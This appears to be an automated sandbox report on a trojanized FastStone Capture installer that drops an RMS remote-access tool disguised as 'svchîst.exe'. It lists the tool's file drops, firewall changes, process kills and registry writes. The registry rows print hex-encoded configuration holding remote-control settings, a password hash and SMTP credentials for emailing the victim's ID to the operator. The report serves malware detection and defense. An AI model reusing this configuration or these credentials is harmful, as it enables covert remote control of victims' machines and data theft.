Analysis Overview
SHA256
0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94
Threat Level: Known bad
The file 0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94 was found to be: Known bad.
Malicious Activity Summary
RMS
Drops file in Drivers directory
Modifies Windows Firewall
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Checks installed software on the system
Drops file in System32 directory
Drops file in Program Files directory
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Views/modifies file attributes
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
Runs ping.exe
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-04-27 17:37
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2022-04-27 17:37
Reported
2022-04-27 19:29
Platform
win10v2004-20220414-en
Max time kernel
185s
Max time network
192s
Command Line
Signatures
RMS
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\drivers\install.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\install.exe | C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\svchîst.exe | C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\svchîst.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
Modifies Windows Firewall
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
Loads dropped DLL
Checks installed software on the system
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\idfgvgjnghcdfb.reg | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\idfgvgjnghcdfb.reg | C:\Windows\SysWOW64\attrib.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe | N/A |
| File created | C:\Program Files (x86)\FastStone Capture\FSCaptureHelp.chm | C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe | N/A |
| File created | C:\Program Files (x86)\FastStone Capture\FSFocus.exe | C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe | N/A |
| File created | C:\Program Files (x86)\FastStone Capture\FSCapture.LANG | C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe | N/A |
| File created | C:\Program Files (x86)\FastStone Capture\FSRecorder.LANG | C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe | N/A |
| File created | C:\Program Files (x86)\FastStone Capture\FSCrossHair.exe | C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe | N/A |
| File created | C:\Program Files (x86)\FastStone Capture\FSLogo.png | C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe | N/A |
| File created | C:\Program Files (x86)\FastStone Capture\FSRecorder.exe | C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe | N/A |
| File created | C:\Program Files (x86)\FastStone Capture\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3733392d3236372d3832322d3730353c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e747275653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\CalendarRecordSettings = fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600390031003100300022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00 | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
